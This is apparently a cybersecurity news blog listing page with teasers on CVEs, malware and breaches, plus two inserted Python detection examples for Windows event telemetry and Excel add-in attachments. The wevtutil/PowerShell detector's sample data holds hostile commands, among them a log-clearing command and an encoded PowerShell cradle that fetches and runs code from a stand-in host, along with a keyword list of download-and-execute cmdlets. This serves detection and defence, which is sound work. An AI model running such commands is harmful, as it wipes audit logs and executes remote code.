Home 2017-08-28T17:57:09+05:30

Pumakit: Advanced Linux Rootkit Targets Critical Infrastructure

A highly sophisticated Linux rootkit, Pumakit, has been identified targeting critical infrastructure sectors like telecommunications, finance, and national security. Discovered by Elastic Security Labs, Pumakit highlights a growing trend of [...]

Microsoft Teams now lets users customize notification banner positions

Microsoft Teams now lets users customize banner notification positions to improve focus and productivity. This feature is available for Public Preview and Microsoft 365 Targeted Release members. Microsoft Teams New [...]

AWS Addresses Security Flaws in WorkSpaces, AppStream 2.0, and DCV

AWS has issued a critical security advisory for vulnerabilities in certain versions of its clients for Amazon WorkSpaces, AppStream 2.0, and NICE DCV, identified as CVE-2025-0500 and CVE-2025-0501. These vulnerabilities [...]

New Tool Launched to Detect Hacking Content on Telegram

A Russian developer, supported by the National Technology Initiative, has launched the Apparatus Sapiens AI module to scan Telegram chats and groups, detecting malicious content swiftly to bolster RuNet security [...]

By | January 18th, 2025|Internet Security, Security Advisory, Security Update, Tips|0 Comments

‘Sneaky 2FA’ Phishing Kit Bypasses Microsoft 365 Authentication

Researchers have discovered "Sneaky 2FA," a phishing kit that has targeted Microsoft 365 accounts since October 2024 to steal credentials and bypass 2FA codes. The "Sneaky 2FA" phishing [...]

Exploit Enables NTLMv1 Despite Active Directory Limits

Silverfort's Dor Segal reports that a misconfiguration in on-premises applications bypasses the Active Directory Group Policy meant to disable NTLMv1, rendering that control ineffective. NTLM, still widely used [...]

By | January 16th, 2025|Exploitation, Internet Security, Security Advisory, Security Update, Tips|0 Comments

Hackers Exploit YouTube Links and Microsoft 365 Themes to Steal Logins

Cybercriminals are running advanced phishing attacks on Microsoft 365 users using fake URLs that closely resemble real O365 domains, tricking victims into trusting them. The attackers [...]

Hackers Exploit Zero-Day in Fortinet Firewalls

Hackers are targeting Fortinet FortiGate firewalls with exposed management interfaces online. Arctic Wolf reports that between November and December 2024, attackers exploited a suspected zero-day vulnerability to gain unauthorized access [...]

Microsoft Alerts Microsoft 365 Users to MFA Issue

Microsoft has warned of an MFA issue affecting some Microsoft 365 users, blocking access to certain applications and disrupting essential operations. Microsoft announced the issue through its official MSFT365 Status [...]

By | January 13th, 2025|Internet Security, Microsoft, Security Advisory, Security Update, Tips|0 Comments

Juniper Networks Flaw Allowed Remote Network Attacks

Juniper Networks disclosed CVE-2025-21598, a critical vulnerability in Junos OS and Junos OS Evolved: an out-of-bounds read in the routing protocol daemon (rpd) that remote attackers can trigger, causing crashes [...]

Fake LDAPNightmare PoC Exploit Delivers Info-Stealing Malware

Cybercriminals are capitalizing on the critical LDAP vulnerabilities (CVE-2024-49112 and CVE-2024-49113) by distributing fake proof-of-concept (PoC) exploits for "LDAPNightmare" (CVE-2024-49113). These fake PoCs, disguised as legitimate tools, trick security researchers and administrators [...]

PriveShield: Advanced Privacy with Profile Isolation

The PriveShield browser extension automatically creates isolated profiles that group websites by browsing habits and interactions, blocking the cross-site tracking and cookie matching used for targeted ads. Evaluation [...]

By | January 8th, 2025|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Chrome Update: Fixes for Multiple Security Flaws

Google has updated Chrome to version 131.0.6778.264/.265 for Windows and Mac, and 131.0.6778.264 for Linux, fixing critical security flaws. The update will roll out gradually, and users are urged to [...]

Hackers breached Argentina’s airport security payroll system

Hackers breached the payroll system of Argentina's Airport Security Police (PSA), exposing sensitive employee information. They accessed salary records and altered pay slips, making unauthorized deductions of between 2,000 and 5,000 pesos under [...]

WordPress Plugin Exploits Websites to Steal Customer Payment Information

Cybercriminals created PhishWP, a malicious WordPress plugin, to mimic payment gateways like Stripe for phishing attacks on compromised sites. PhishWP integrates with Telegram to steal real-time data, including credit card [...]

Android Security Update Fixes Critical RCE Vulnerabilities

The January 2025 Android Security Bulletin highlights critical vulnerabilities affecting Android devices. Users should update to security patch level 2025-01-05 or later to stay protected. The bulletin [...]

WordPress Plugin Flaw Puts 3 Million Sites at Risk of Injection Attacks

A critical vulnerability has been found in the UpdraftPlus: WP Backup & Migration Plugin, affecting over 3 million WordPress sites. This flaw allows unauthenticated attackers to exploit a PHP Object [...]

Critical OpenSSH Vulnerability (CVE-2024-6387) Exploit Released

A PoC exploit for the critical OpenSSH vulnerability CVE-2024-6387 has been released. The flaw lets remote attackers execute arbitrary code on vulnerable servers, posing serious risks to users. The vulnerability [...]

Apple Settles Siri Privacy Lawsuit for $95M

Apple has agreed to pay $95 million to settle a class-action lawsuit claiming Siri violated users' privacy by recording conversations without consent. The settlement, filed in federal court in Oakland, [...]

By | January 3rd, 2025|Apple, Internet Security, Security Advisory, Security Update|0 Comments

ASUS Vulnerabilities Allow Arbitrary Command Execution

ASUS warns of critical router flaws (CVE-2024-12912, CVE-2024-13062) allowing arbitrary command execution. Users are urged to update their devices immediately. The vulnerabilities are tied to the router firmware’s [...]

Cyberhaven Chrome Extension Compromised, Potentially Impacting 400,000 Users

Cyberhaven, a cybersecurity company, revealed that its Chrome extension, with over 400,000 users, was targeted in a cyberattack on Christmas Eve 2024. The attack was part of a larger campaign [...]

By | December 31st, 2024|BOTNET, Compromised, Data Breach, Security Advisory, Security Update|0 Comments

PoC Exploit Released for Oracle WebLogic Vulnerability

Researchers warn of a public PoC exploit for a critical Oracle WebLogic vulnerability. The flaw, CVE-2024-21182, is a serious risk for organizations using Oracle WebLogic Server, allowing [...]

Microsoft warns of a Windows 11 24H2 issue blocking security updates

Microsoft has warned of an issue affecting Windows 11 version 24H2 that blocks critical security updates. The problem occurs when users install this version using media with the October or [...]

By | December 31st, 2024|Internet Security, Microsoft, Security Advisory, Security Update, Tips|0 Comments

New Botnet exploits D-Link routers for remote control

Researchers observed increased activity from the "FICORA" and "CAPSAICIN" botnet variants, which exploit vulnerabilities in outdated D-Link routers such as the DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. Attackers use the HNAP protocol to execute [...]

IBM AIX TCP/IP vulnerability allows Denial of Service attacks

IBM has warned of two security flaws (CVE-2024-47102 and CVE-2024-52906) in its AIX operating system that could cause systems to crash (denial-of-service attacks). These flaws affect specific parts of AIX [...]

Adobe warns of ColdFusion file-reading vulnerability

Adobe released a critical security update for ColdFusion to address a vulnerability that allows attackers to read arbitrary files. This vulnerability allows attackers to [...]

By | December 27th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Araneida Scanner – Hackers Exploit Cracked Acunetix Scanner

Threat analysts report the “Araneida Scanner,” based on a cracked Acunetix version, is used for illegal activities like data scraping and exploiting vulnerabilities. Sold on Telegram, it’s actively used by [...]

Node.js systeminformation Package Enables RCE Attacks

A critical command injection vulnerability in the systeminformation npm package, CVE-2024-56334, exposes millions of systems to RCE and privilege escalation attacks. The flaw affects versions ≤5.23.6 and lies in the [...]

Malicious Amazon Appstore apps record screens and intercept OTPs

The “BMI CalculationVsn” app on the Amazon Appstore secretly collects sensitive data, such as installed app package names and SMS messages, posing a privacy risk. Its true intent appears to be [...]

Skuld Malware Exploits Windows Utilities Packages

Researchers uncovered a malware campaign in the npm ecosystem in which a publisher using the handle “k303903” spread the Skuld info stealer through fake packages, compromising hundreds of machines before the packages were removed. Analysis shows [...]

BADBOX botnet hacked 74,000 Android devices with remote codes

BADBOX is a cybercriminal operation that infects Android devices, like TV boxes and smartphones, with malware before they are sold. These devices, often sold through trusted retailers, pose a major [...]

Malicious supply chain attacks shift from npm to VSCode Marketplace

Researchers have observed a rise in malicious activity on the VSCode Marketplace, exposing its vulnerability to supply chain attacks similar to those previously seen in the npm community. Malicious actors [...]

Careto: A Notorious Threat Group Targets Windows with Microphone Recording and File Theft

Recent research links Careto (The Mask) to a 2022 attack on a Latin American organization, in which the group exploited an MDaemon email server and its WorldClient webmail for persistent access. The initial compromise method [...]

New VIPKeyLogger in Office Docs Steals Credentials

VIPKeyLogger, similar to the Snake Keylogger, spreads through phishing campaigns via attachments disguised as archive or Microsoft 365 files. It uses malicious Office documents to connect to C2 servers and [...]

Hackers Abuse Microsoft Management Console Files for Backdoor Payloads

The FLUX#CONSOLE campaign is a multi-stage attack that abuses .MSC (Microsoft Management Console) files to deliver backdoor malware, combining phishing with abuse of a legitimate Windows feature. It [...]

Malicious ads on CAPTCHA pages spread password stealers

Cybercriminals are using fake CAPTCHA pages, delivered through malicious ads and often shown as pop-ups, to spread password-stealing malware. The pages mimic legitimate verification prompts and trick users into running harmful PowerShell commands [...]

By | December 18th, 2024|Internet Security, Security Advisory, Security Update, Tips|0 Comments

Hackers exploit Apache Struts2 flaw to upload malware

Hackers are exploiting a new Apache Struts2 vulnerability (CVE-2024-53677), rated critical with a CVSS score of 9.5. Apache Struts2 recently announced a vulnerability with path-traversal, [...]

Hackers Exploit Microsoft Teams for Remote System Access

Hackers used Microsoft Teams to trick victims into granting remote system access, showcasing advanced social engineering tactics, according to Trend Micro. The [...]

Dell Security Update Patches Multiple Critical Vulnerabilities

Dell Technologies has issued a security advisory for critical vulnerabilities that could be exploited by attackers. Customers should update their systems to fix two critical CVEs affecting multiple Dell products. [...]

By | December 13th, 2024|Internet Security, Security Advisory, Security Update, vulnerability|0 Comments

Stealthy Linux Malware PUMAKIT Escalates Privileges

Researchers at Elastic Security Labs discovered PUMAKIT, a Linux malware using stealth and unique privilege escalation to persist on infected systems. PUMAKIT has a multi-stage setup, including a dropper, two [...]

Emoji Exploit Targets iOS Messenger Group Calls

A new vulnerability in Facebook Messenger for iOS could disrupt group calls by exploiting emoji reactions. Discovered by Signal 11 Research in version 472.0.0 and analyzed in version 477.0.0, this [...]

Skoda and Volkswagen car vulnerabilities allow hackers to track users remotely

Researchers have found vulnerabilities in the infotainment systems of some Skoda and Volkswagen cars, which could let hackers track users and access sensitive data remotely. PCAutomotive, an automotive cybersecurity firm, [...]

By | December 12th, 2024|Internet Security, Security Advisory, Security Update, vulnerability|0 Comments

Microsoft 365 Services Affected: Web Apps and Admin Center Down

Microsoft is investigating a widespread outage that impacted access to Microsoft 365 web apps and the admin center. Users experienced issues connecting to services like Outlook, OneDrive, and other Office [...]

By | December 11th, 2024|Internet Security, Microsoft, Security Advisory, Security Update|0 Comments

Meeten Malware Targets macOS and Windows to Steal Logins

Realst malware targets Web3 professionals through fake companies such as "Meetio", complete with AI-generated content. Victims are lured into downloading malicious meeting apps during fake video calls. Realst is a [...]

Microsoft Patch Tuesday: 71 Vulnerabilities Fixed

Microsoft’s final Patch Tuesday of 2024 addresses 71 vulnerabilities, including 16 critical ones and a zero-day. This update highlights Microsoft’s commitment to improving product security and safeguarding users from cyber [...]

Critical Qlik Sense RCE vulnerability discovered

A high-severity vulnerability in Qlik Sense for Windows may allow remote code execution. It affects all versions up to the May 2024 Patch 9 release. The "High" severity vulnerability in [...]

Cipla Allegedly Hacked, Akira Ransomware Claims 70GB Data Stolen

Cipla, an Indian pharmaceutical company, has reportedly been attacked by the Akira ransomware group. The hackers claim to have stolen 70GB of sensitive data. This breach has raised concerns about [...]

By | December 9th, 2024|Internet Security, Ransomware, Security Advisory, Security Update, Tips|0 Comments

Google Launches Vanir: An open-source tool for validating security patches

Google has launched Vanir, an open-source tool to simplify and automate security patch validation. First previewed at the Android Bootcamp in April, Vanir helps Android developers and OEMs quickly adopt [...]

By | December 9th, 2024|google, Internet Security, Security Advisory, Security Update, Tips|0 Comments

SonicWall Flaws Enable Remote Code Execution

SonicWall warns of critical flaws in SMA 100 series appliances, enabling remote code execution, authentication bypass, and system compromise. SonicWall advises users to update their SMA 200, 210, 400, 410, [...]

HCL DevOps Deploy & Launch Vulnerable to HTML Injection

A newly discovered vulnerability in HCL Software's DevOps Deploy and Launch platforms, CVE-2024-42195, allows attackers to insert arbitrary HTML tags into the web UI, which could expose sensitive information. [...]

By | December 6th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

ChatGPT Next Web Vulnerability Allows SSRF Exploits via Endpoint

Researchers reported CVE-2023-49785, a critical ChatGPT Next Web (NextChat) vulnerability, raising cybersecurity concerns over its SSRF exploitation potential. NextChat is a web interface for large language models (LLMs) like ChatGPT, [...]

ElizaRAT Uses Google, Telegram, & Slack for C2 Communications

APT36, a Pakistani cyber-espionage group, now uses ElizaRAT, a Windows RAT with advanced evasion and C2 features, to target Indian government, diplomats, and military. APT36 uses Windows, Linux, and Android [...]

Hackers Exploit Windows Event Logs for Manipulation and Data Theft

Attackers abuse wevtutil.exe, the built-in Windows tool for managing event logs, as a LOLBAS (living-off-the-land binary) for command execution, payload downloads, and persistence while evading security controls. Although wevtutil.exe is a legitimate administrative tool, attackers can misuse it [...]
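The fake-CAPTCHA item above and this wevtutil item describe two living-off-the-land patterns that surface in the same telemetry: process-creation events. The Python below is an added example written for this page, not code from the articles or from the researchers they cite. The indicators it applies are the author's own assumptions about what the abuse looks like (`wevtutil cl`, `epl`, or `sl /e:false`; PowerShell started from explorer.exe with a hidden window or an encoded command that decodes to a download-and-execute cradle), and the sample events, including their field names, are constructed for the demonstration.

```python
"""Flag wevtutil.exe abuse and user-launched PowerShell one-liners in process-creation events.
Added example; the indicators are the author's assumptions, not rules taken from the articles."""
import base64
import shlex


def _b64_utf16(text):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; used here only to build a sample."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample events (field names are assumed; not from any real incident).
SAMPLE_EVENTS = [
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},                                 # wipes the Security log
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": r"wevtutil epl Security C:\Users\Public\sec.evtx"},     # exports the log to a file
    {"parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -enc "
                + _b64_utf16("iex (iwr http://captcha.invalid/verify.txt)")},  # fake-CAPTCHA style
    {"parent": "services.exe", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": "wevtutil qe Application /c:10 /f:text"},               # routine query: benign
    {"parent": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\scripts\backup.ps1"},  # benign
]

# Cmdlets and aliases that fetch and run code; matched in the command line or the decoded payload.
DOWNLOAD_EVAL = ("iex", "invoke-expression", "iwr", "invoke-webrequest",
                 "downloadstring", "frombase64string")


def _tokens(cmdline):
    """Split a Windows command line; posix=False keeps backslashes and quotes intact."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:
        return cmdline.split()


def _is_flag(token, full_name):
    """True if token abbreviates a PowerShell parameter, e.g. -enc, -ec or -e for -EncodedCommand."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return full_name.startswith(token[1:].lower())


def decode_encoded_command(b64):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); None if it is not one."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the reasons an event looks suspicious; an empty list means no indicator fired."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].lower()
    args = _tokens(event["cmdline"])[1:]
    reasons = []

    if image == "wevtutil.exe" and args:
        verb = args[0].lower()
        if verb == "cl":
            reasons.append("wevtutil cl: clearing an event log")
        elif verb == "epl":
            reasons.append("wevtutil epl: exporting an event log to a file")
        elif verb == "sl" and any(a.lower() == "/e:false" for a in args):
            reasons.append("wevtutil sl /e:false: disabling an event log channel")

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = None
        for i, tok in enumerate(args[:-1]):
            nxt = args[i + 1]
            if _is_flag(tok, "encodedcommand"):
                decoded = decode_encoded_command(nxt)
                reasons.append("encoded command: " + (decoded if decoded else "<undecodable>"))
            elif _is_flag(tok, "windowstyle") and nxt.lower().startswith("h"):
                reasons.append("hidden window")
        haystack = (decoded or event["cmdline"]).lower()
        hits = [k for k in DOWNLOAD_EVAL if k in haystack]
        if hits:
            reasons.append("download-and-execute: " + ", ".join(hits))
        if reasons and parent == "explorer.exe":
            reasons.append("started from explorer.exe, i.e. typed or pasted by the user")

    return reasons


def scan(events):
    """Return (index, reasons) for every event with at least one indicator."""
    out = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            out.append((i, reasons))
    return out


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], "->", "; ".join(reasons))
```

The three malicious samples are reported with their reasons while the routine `wevtutil qe` and the scheduled backup script pass. Decoding `-EncodedCommand` is what makes the third sample visible: a plain string match on the command line never sees the `iex (iwr ...)` cradle hidden in the base64.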

Apple Safari JavaScriptCore RCE Vulnerability Actively Exploited 

CVE-2024-44308, a critical JavaScriptCore vulnerability in Safari, has been actively exploited against iOS, visionOS, and macOS. The flaw affects several Apple platforms; the affected and patched versions for each are tabulated in the full article. [...]

By | December 3rd, 2024|Apple, Internet Security, Security Advisory, Security Update, Tips|0 Comments

Amazon GuardDuty Gains AI/ML Threat Detection for Cloud Security

Amazon has improved cloud security with AI/ML threat detection in GuardDuty. This new feature enhances threat detection by using AWS's cloud visibility and scale to better protect applications, workloads, and [...]

By | December 2nd, 2024|cloud, Internet Security, Security Advisory, Security Update|0 Comments

HPE IceWall Flaw Enabled Unauthorized Data Changes

HPE has released a security alert about a critical flaw in its IceWall product, CVE-2024-11856, which lets attackers remotely modify data without authorization. The flaw stems from a [...]

Matrix Orchestrates Global DDoS Attack Campaign

Cybersecurity researchers have uncovered a large-scale DDoS campaign attributed to a threat actor known as "Matrix." Despite the actor's low technical skills, the campaign demonstrates how easily accessible tools are [...]

Beware of PixPirate Malware Targeting WhatsApp Users

PixPirate malware is targeting users in Brazil, India, Italy, and Mexico, posing as a fake authentication app to steal banking data. It spreads through smishing and WhatsApp spam from infected [...]

NVIDIA Vulnerability Enables Data Tampering and Privilege Escalation

NVIDIA has issued a critical security update for a major vulnerability in its Unified Fabric Manager (UFM) products. Identified as CVE-2024-0130, the flaw has a high CVSS v3.1 score of [...]

Exploitation of ProjectSend Authentication Vulnerability Discovered in the Wild

ProjectSend, an open-source file-sharing web app, is being actively exploited. CVE-2024-11680 was assigned on November 25, 2024, but a patch has been available for over a year, and many instances remain [...]

New Stealthy GodLoader Malware Targets Multiple Platforms

GodLoader malware, discovered by Check Point, stealthily infects Windows, macOS, Linux, Android, and iOS, using the Godot Engine to evade antivirus detection. GodLoader uses the Godot Engine’s scripting [...]

RomCom Hackers Exploit Windows Zero-Days & Firefox Vulnerability

The Russian-aligned group RomCom exploited two critical zero-day vulnerabilities in Mozilla Firefox and Windows in a sophisticated cyber-espionage campaign, allowing attackers to execute malicious code without user interaction. The first [...]

Huge Credit Card Breach: Database of Over 1.2 Million Cards Found on Dark Web

A major data breach has caused widespread concern, as a database with sensitive financial details of over 1.2 million credit cards was leaked on the dark web. Cybersecurity sources report [...]

Meta has taken down 2 million malicious accounts

Meta has removed over 2 million accounts involved in malicious activities, including complex fraud schemes like "pig butchering." This action is part of Meta’s ongoing efforts to fight criminal networks [...]

Python NodeStealer Targets Facebook Business Accounts for Credential Theft

The Python-based NodeStealer has evolved, now targeting Facebook Ads Manager budgets, stealing credit card info, and browser credentials. It uses Windows Restart Manager to unlock databases and employs obfuscation techniques [...]

Helldown Ransomware Targets ESXi and Linux

Helldown, a new ransomware group, has been exploiting vulnerabilities to breach networks and compromise victims since August 2024, with 28 breaches reported so far. They have been leaking stolen data [...]

Two Malicious PyPi Packages Mimicking ChatGPT & Claude Steal Developer Data

Two malicious Python packages pretending to be tools for ChatGPT and Claude were found on PyPI, the official Python library repository. They went undetected for over a year, compromising developer [...]

Trend Micro Deep Security Flaw Allows Remote Code Execution

Trend Micro has revealed a critical vulnerability, CVE-2024-51503, in the Deep Security 20 Agent that could allow remote code execution on affected systems. The vulnerability, identified [...]

Hackers Exploit Misconfigured Servers to Stream Live Sports

Recent threat analysis examined outbound traffic and binaries in container environments. Researchers, using honeypot data and threat intelligence, flagged unusual network events involving the tool ffmpeg. While not malicious itself, [...]

Apache Kafka Vulnerability Enables Privilege Escalation

A new vulnerability, CVE-2024-31141, was found in Apache Kafka Clients, allowing attackers to escalate privileges and gain unauthorized file access. Rated as Moderate, it affects several versions and is a [...]

By | November 19th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Citrix Virtual Apps & Desktops Zero-Day Actively Exploited

A critical unpatched vulnerability has been found in Citrix Virtual Apps and Desktops and is now being actively exploited. The flaw, revealed by watchTowr Labs, poses a significant risk, especially in remote [...]

Zohocorp ADAudit Plus SQL Injection Vulnerability

Zoho released a security update for a critical SQL injection flaw in ADAudit Plus (CVE-2024-49574), fixed in version 8123 on November 8, 2024. The SQL injection vulnerability was found in [...]

By | November 18th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

CISA Warns of Exploited Palo Alto Networks Vulnerabilities

CISA issued an urgent alert for two Palo Alto Networks vulnerabilities, CVE-2024-9463 and CVE-2024-9465, which are actively being exploited by cybercriminals. These vulnerabilities pose serious risks, especially to federal systems. [...]

Chinese SilkSpecter hackers targeting Black Friday shoppers

The Chinese hacker group SilkSpecter launched a phishing campaign targeting Black Friday shoppers in Europe and the USA, using Stripe to harvest card data while still letting legitimate transactions complete. [...]

4M+ WordPress Sites Vulnerable After Plugin Flaw

A critical flaw in the 'Really Simple Security' WordPress plugin puts over 4 million sites at risk. CVE-2024-10924 allows remote attacks and unauthorized admin access. The vulnerability impacts versions 9.0.0 to 9.1.1.1 of [...]

Windows 0-Day Exploited with Single Right Click

A recently discovered zero-day vulnerability, CVE-2024-43451, is being actively exploited, targeting Windows systems across multiple versions. Identified by the ClearSky Cyber Security team in June 2024, this vulnerability has been [...]

Google to Issue CVEs for Major Cloud Security Flaws

Google Cloud will start issuing CVEs for critical vulnerabilities in its services, aiming to boost transparency and security. This step highlights Google’s commitment to helping organizations guard against threats and [...]

By | November 14th, 2024|google, Internet Security, Security Advisory, Security Update, Tips|0 Comments

Critical Flaw Found in Dell SONiC

Dell Technologies has revealed critical vulnerabilities in its Enterprise SONiC OS (versions 4.1.x and 4.2.x), which could allow attackers to take control of affected systems. Users are urged to upgrade [...]

By | November 13th, 2024|Internet Security, Security Advisory, Security Update, Tips, vulnerability|0 Comments

Amazon Confirms Employee Data Breach Through Third-Party Vendor

Amazon confirmed that employee data was exposed in a breach at a third-party vendor, in which attackers exploited a critical vulnerability in MOVEit file transfer software. The CVE-2023-34362 vulnerability, first reported [...]

Hackers Use Google Ads to Distribute Fakebat Malware

Researchers have found that Fakebat malware is again being spread through malicious Google Ads, targeting users searching for popular productivity software. Malwarebytes flagged an ad impersonating the app Notion. The [...]

By | November 12th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update, Tips|0 Comments

Roblox Devs Targeted with Malicious npm Packages

Researchers found five malicious npm packages targeting Roblox developers, stealing credentials and personal data. These packages, including autoadv, ro.dll, node-dlls, and two rolimons-api versions, mimic legitimate modules commonly used by [...]

By | November 12th, 2024|BOTNET, Compromised, Exploitation, Security Advisory, Security Update|0 Comments

Hackers Use Malicious Excel Files to Deliver Remcos RAT to Windows Users

Hackers favor Excel documents because they are ubiquitous and can carry executable content. With VBA macros now blocked by default, they have turned to “.XLL” files, which are native Excel add-in DLLs, to deliver malware. [...]
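Because an XLL is a native DLL, the cheapest triage for the attachments described above is to look at the bytes rather than trusting the file name. The Python below is an added example for this page, not the researchers' tooling: it checks for a PE header, for the Excel add-in entry-point names that an XLL exports (a byte-string search standing in for export-table parsing), and for a PE hiding behind a spreadsheet extension. The sample attachments are constructed inside the block, and the heuristics are the author's; they flag add-ins, not maliciousness, so a legitimate XLL is reported too.

```python
"""Triage attachments for Excel add-ins (.XLL), which are native DLLs that Excel loads and whose
xlAutoOpen export runs when the add-in is opened.  Added example; the checks are the author's."""
import struct

# Entry points Excel looks up in an add-in; an XLL normally exports at least xlAutoOpen.
XLL_EXPORTS = (b"xlAutoOpen", b"xlAutoClose", b"xlAddInManagerInfo")
# Extensions a mail user expects to be data, not code.
SPREADSHEET_EXTS = {"xls", "xlsx", "xlsm", "xlsb", "csv"}


def is_pe(data):
    """True if data has a DOS 'MZ' stub whose e_lfanew field points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def looks_like_xll(filename, data):
    """Return the reasons an attachment looks like an Excel add-in; empty list means none fired."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    reasons = []
    if ext == "xll":
        reasons.append("extension .xll")
    if not is_pe(data):
        return reasons
    reasons.append("PE executable")
    # Export names live as ASCII strings in the export directory, so a substring search
    # approximates a full PE export-table walk for triage purposes.
    hits = [name.decode() for name in XLL_EXPORTS if name in data]
    if hits:
        reasons.append("Excel add-in exports: " + ", ".join(hits))
    if ext in SPREADSHEET_EXTS:
        reasons.append("PE bytes behind a .%s name" % ext)
    return reasons


def triage(attachments):
    """Map attachment name -> reasons for every attachment that fired at least one check."""
    flagged = {}
    for name, data in attachments.items():
        reasons = looks_like_xll(name, data)
        if reasons:
            flagged[name] = reasons
    return flagged


def _fake_xll():
    """Constructed stand-in for an XLL: MZ stub, e_lfanew -> PE signature, then an export name."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)        # e_lfanew points just past the stub
    return bytes(hdr) + b"PE\0\0" + b"\0" * 0x20 + b"xlAutoOpen\0"


# Constructed sample attachments (not real files): an add-in, an add-in renamed as a
# spreadsheet, and a genuine OOXML workbook, which is a zip and therefore starts with 'PK'.
SAMPLE_ATTACHMENTS = {
    "Invoice_2024.xll": _fake_xll(),
    "Quarterly.xlsx": _fake_xll(),
    "Quarterly_real.xlsx": b"PK\x03\x04" + b"\0" * 60,
}

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_ATTACHMENTS).items():
        print(name, "->", "; ".join(reasons))
```

The renamed add-in is the case worth keeping in mind: an extension filter alone would pass `Quarterly.xlsx`, while the PE check catches it regardless of name.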

By | November 11th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update, windows|0 Comments

Watch Out for Fake Copyright Claims Spreading Rhadamanthys Stealer

Check Point security experts recently warned about fake copyright claims spreading the Rhadamanthys stealer malware. Stealer malware is designed to infiltrate computers and steal sensitive data. Once installed, it connects to a [...]

By | November 9th, 2024|malicious cyber actors, Malware, Security Advisory, Security Update|0 Comments

Cisco Vulnerability Allowed Attackers to Execute Commands as Root

A critical vulnerability in Cisco Unified Industrial Wireless Software, affecting Cisco Ultra-Reliable Wireless Backhaul (URWB) Access Points, has been discovered. Tracked as CVE-2024-20418, this flaw allows unauthenticated remote attackers [...]

ToxicPanda Malware Targets Bank Users

Recent research has identified a new Android malware strain, initially mistaken for TgToxic, now called ToxicPanda. Although it shares some bot command similarities, ToxicPanda’s code diverges significantly, lacking key TgToxic [...]

Threat Actor Leaks Alleged Nokia Source Code

The threat actor known as IntelBroker, along with EnergyWeaponUser, has claimed responsibility for a major data breach involving Nokia’s proprietary source code. This news has shaken the tech industry and [...]

ClickFix Malware Targets GMeet, Zoom Pages

The “ClickFix” tactic exploits fake Google Meet and Zoom pages to deliver advanced malware, mimicking legitimate video conferencing platforms used for business and personal communication. The Sekoia TDR team monitors [...]

Hackers Bypass Endpoints with EDRSandBlast

Palo Alto Networks’ Unit 42 recently found that hackers are using AV and EDR bypass tools from cybercrime forums to evade endpoint security. An extortion probe revealed two outdated [...]

Spectre Flaw Persists in AMD, Intel CPUs

Researchers have demonstrated a Spectre exploit that bypasses the Indirect Branch Predictor Barrier (IBPB) mitigation. The issue affects modern AMD and Intel CPUs and may result in data [...]

SYS01 InfoStealer Malware Targets Meta Business Page

The Meta malvertising campaign, active for over a month, spreads SYS01 InfoStealer by disguising it within ElectronJs apps, presented as legitimate tools like video editors, productivity software, and streaming services. [...]

Evasive Panda Targets Cloud Services with New Toolkit to Steal Data

Evasive Panda deployed a new C# tool, CloudScout, in early 2023 to target a Taiwanese government entity. CloudScout uses modules to hijack web sessions, accessing services like Google Drive, Gmail, [...]

Critical Chrome Security Vulnerabilities Fixed

Google has released a Chrome update addressing critical vulnerabilities, safeguarding millions of users. The latest Stable version, 130.0.6723.91/.92, is now rolling out for Windows, Mac, and Linux, with Extended Stable [...]

Hackers Exploit SonicWall VPNs with Fog Ransomware

Recent cyberattacks by Akira and Fog threat actors have targeted multiple industries by exploiting a vulnerability (CVE-2024-40766) in SonicWall SSL VPN devices, using malicious VPN logins from VPS-hosted IP addresses [...]

WrnRAT Delivered as Gambling Games

WrnRAT is a new malware that cybercriminals deploy by disguising it as popular gambling games like Badugi, Go-Stop, and Hold'em. Attackers set up a fake gambling website that [...]

Realtek SD Card Driver Flaw Impacts Laptops

Multiple vulnerabilities in the Realtek SD card reader driver, RtsPer.sys, affect laptops from major brands like Dell and Lenovo. These flaws have existed for years and allow local users to exploit the [...]

Critical Authentication Flaw in WhatsUp Gold Exposes Organizations to Attack

WhatsUp Gold, a popular network monitoring tool, has a critical vulnerability in versions before 2024.0.0, exposing organizations to potential cyber attacks and unauthorized data access. CVE-2024-6670 and CVE-2024-6671 are critical [...]

Cisco ASA SSH Flaw Leaves Devices Vulnerable

Cisco issued a critical advisory for a vulnerability in its Adaptive Security Appliance (ASA) Software that could let remote attackers execute commands with root privileges. The flaw, CVE-2024-20329, affects devices [...]

Roundcube Webmail Vulnerability Exploited in Attacks

